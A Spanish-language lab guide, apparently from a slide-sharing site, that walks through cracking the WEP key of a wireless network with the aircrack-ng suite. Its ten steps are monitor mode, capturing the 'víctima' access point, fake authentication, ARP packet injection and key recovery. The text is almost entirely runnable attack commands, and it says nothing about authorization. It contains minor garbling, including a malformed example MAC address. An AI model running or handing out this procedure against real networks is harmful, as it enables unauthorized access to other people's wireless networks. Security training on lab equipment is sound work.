Laboratorio hacking de contraseñas wep en redes wlan

2

Click here to load reader

Transcript of Laboratorio hacking de contraseñas wep en redes wlan

Page 1: Laboratorio hacking de contraseñas wep en redes wlan

Jesse Padilla Agudelo http://arpanetblog.com

Laboratorio Hacking de Contraseñas WEP en Redes WLAN

Duración 60 Minutos

Requisitos 1. Computador con Tarjeta de Red Wireless LAN.

2. Sistema Operativo GNU/Linux (Recomendación Backtrack). Valido en entorno de

Virtualización

3. Aplicativos Instalados: aircrack-ng, macchanger.

Nota: Si se hace uso de un entorno de virtualización se requiere de un adaptador Wireless LAN

USB. Dado que las maquinas virtuales crean sus adaptadores de red como interfaces Ethernet.

Desarrollo 1. Comprobar el nombre de los adaptadores de Red Inalámbricos, con: iwconfig o airmon-ng

2. Iniciar el modo monitor en la interfaz de red Wlan0 con el comando airmon-ng start

wlan0

3. Ya tenemos nuestra tarjeta en Modo Monitor,"mon0" es el nombre de la interfaz en modo

monitor.

4. Iniciarnos el proceso de escanear redes disponibles con el siguiente comando:

airodump-ng mon0

5. Esto comenzará a mostrarnos las Redes Disponibles. Seleccionamos el BSSID de la red

victima.

6. En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:

airodump-ng -w redes -c 11 --bssid 00:22:A4:30E:59 mon0 (La MAC presentada es

ejemplo)

donde,

-w = especifica el nombre del archivo donde se guarda la captura de datos

-c = especifica el canal de la Red

--bssid = especifica Mac de Punto de Acceso

mon0 = especifica la interfaz de la tarjeta de Red en Modo Monitor

7. Abrimos una segunda terminal (sin cerrar la primera) y escribimos lo siguiente:

aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0

Esto es para asociar su pc con la Red Víctima

8. Inyectamos paquetes a la red victima, para esto tecleamos lo siguiente:

aireplay-ng -3 -b 00:22:A4:30E:59 mon0

Page 2: Laboratorio hacking de contraseñas wep en redes wlan

Jesse Padilla Agudelo http://arpanetblog.com

Con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la

columna #Data se incrementará rápidamente, y esperamos a que llegue a los 30000 datos

para poder descifrar la contraseña.

9. Cuando llegue a los 30,000 datos abrimos una tercera y última terminal y escribimos el

comando:

aircrack-ng redes-01.cap

redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 6

presionamos enter y aircrack nos presentara la llave Wep descifrada

10. Key Found¡ (09:86:23:47:63)

Nota: Si en algún punto requerimos especificar el canal para la interfaz mon0 lo hacemos con

el comando airmon-ng start wlan0 –chanel #